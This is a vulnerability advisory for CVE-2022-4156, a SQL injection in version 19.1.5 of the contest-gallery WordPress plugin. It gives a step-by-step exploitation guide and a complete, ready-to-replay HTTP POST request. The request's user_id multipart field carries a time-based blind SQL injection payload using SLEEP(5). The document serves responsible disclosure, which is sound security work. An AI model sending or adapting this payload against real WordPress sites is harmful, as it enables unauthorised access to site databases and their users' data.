contest-gallery 19.1.5 (1/15) WordPress plug-in SQL injection
Vulnerability Metadata
Key | Value |
---|---|
Date of Disclosure | December 05 2022 |
Affected Software | contest-gallery |
Affected Software Type | WordPress plugin |
Version | 19.1.5 |
Weakness | SQL Injection |
CWE ID | CWE-89 |
CVE ID | CVE-2022-4156 |
CVSS 3.x Base Score | n/a |
CVSS 2.0 Base Score | n/a |
Reporter | Kunal Sharma, Daniel Krohmer |
Reporter Contact | k_sharma19@informatik.uni-kl.de |
Link to Affected Software | https://wordpress.org/plugins/contest-gallery/ |
Link to Vulnerability DB | https://nvd.nist.gov/vuln/detail/CVE-2022-4156 |
Vulnerability Description
The MULTIPART user_id
POST query parameter in contest-gallery 19.1.5 is vulnerable to SQL Injection. An attacker with no privileges can abuse the Update Profile functionality in post_cg_backend_image_upload
function inside ajax-functions-backend.php
. This leads to a threat actor crafting a malicious POST request.
Exploitation Guide
Create a New Gallery, if no gallery was created before.
Change the Gallery name.
Add User Registration
and User Login
.
These registration and login forms can be used by any external user to login and register as Contest Gallery User
.
Add a New User either via User Registration
form above or by Add User
option on WordPress Dashboard.
Note: Here we create user via Add User
option on WordPress Dashboard, and assign Contest Gallery User
role
Login with the new user via wp-admin
login or User Login
on the page with user_login
shortcode.
Click on Update Profile
.
Clicking Update Profile
triggers the update request, copy Cookie
,_wpnonce
, and email
value.
Replace the copied values in the Exploit Payload.
Sending the request with POC triggers the vulnerable request. The MULTIPART user_id
is the vulnerable parameter.
In the application code, the vulnerability is triggered by un-sanitized user input of user_id
at line 67
in ./ajax/ajax-functions-backend.php
.
At line 80
in ./ajax/ajax-functions-backend.php
the database query call on $WpUserId
leads to SQL Injection.
Exploit Payload
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.
The SQL injection can be triggered by sending the request below:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/profile.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------5167035403431582548369588705
Content-Length: 2816
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=test1%7C1668471291%7C7VPhYIeBdCjIP9uW8VoyQrGPufCvPRRf5M9OXWus6HS%7C92b6fd388ba13304a4e6d05bb993994b73e939c69f835a5f48832fd667db6a41; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=test1%7C1668471291%7C7VPhYIeBdCjIP9uW8VoyQrGPufCvPRRf5M9OXWus6HS%7C4a47ea962cf6ef424f4c85c035f566bcefb106dac5c9061bff96ab380af53d60; wp-settings-time-3=1668298491
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="_wpnonce"
5c8402bea9
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_input_image_upload_file_to_delete_wp_id"
1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="_wp_http_referer"
/wp-admin/profile.php
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="from"
profile
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="checkuser_id"
3
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="color-nonce"
6f0655e068
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="admin_color"
fresh
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="admin_bar_front"
1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="first_name"
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="last_name"
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="nickname"
test1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="display_name"
test1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="email"
test1@c.com
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="url"
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="description"
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="pass1"
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="pass2"
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_user_data_available"
true
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_user_id"
3
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="action"
post_cg_backend_image_upload
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_input_image_upload_file[]"; filename="index.png"
Content-Type: text/plain
TEST
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="user_id"
3 AND (SELECT 6037 FROM (SELECT(SLEEP(5)))Uiuu)
-----------------------------5167035403431582548369588705--